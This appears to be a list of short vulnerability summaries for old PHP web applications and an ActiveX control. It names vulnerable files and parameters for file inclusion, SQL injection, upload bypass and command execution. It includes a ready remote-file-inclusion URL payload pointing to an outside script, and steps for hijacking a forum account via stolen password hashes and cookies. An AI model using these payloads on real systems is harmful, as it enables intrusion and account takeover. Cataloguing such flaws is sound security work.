UUSEE.ocx, DoCmd() function buffer overflow vulnerability.
X7 Chat is vulnerable to arbitrary local inclusion vulnerability due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability to include and execute arbitrary local files on the vulnerable system.
w-Agora avatar upload option has content file detect option, but it can be replaced with simply editing the POST Request from the browser. By replacing the Content-Type, an attacker can upload a malicious script.
The bug is in the pm system so a registered user can extract a password hash from the forum's data base of the target user. The exploit requires the target user's member ID which can be found under their avatar next to one of their posts. Once the hash is obtained, all forum cookies can be unset and the member_id and pass_hash can be set to the target user's member id and hash respectively.
Aardvark Topsites PHP is vulnerable to a remote command execution vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This exploit uses the lostpw.php file to execute arbitrary commands on the vulnerable server.
/agenda.php3?rootagenda=http://www.yourspace.com/yourscript.php?/agenda2.php3?rootagenda=http://www.yourspace.com/yourscript.txt?
A vulnerability in Aardvark Topsites PHP 4.2.2 allows remote attackers to include arbitrary files via a URL in the CONFIG[path] parameter to join.php.
A sql injection vulnerability in NoticeBoardPro 1.0 can be exploited to extract arbitrary data. In some environments it may be possible to create a PHP shell. An arbitrary upload vulnerability in NoticeBoardPro 1.0 can be exploited to upload a PHP shell.
A vulnerability in Limbo CMS <= 1.04 allows remote attackers to execute arbitrary PHP code via a URL in the classes_dir parameter to classes/adodbt/sql.php.
The Knowledge Base Mod for PHPbb <= 2.0.2 is vulnerable to a remote file inclusion vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This request contains a malicious URL in the module_root_path parameter of the /includes/kb_constants.php file. This malicious URL can be used to execute arbitrary code on the vulnerable server.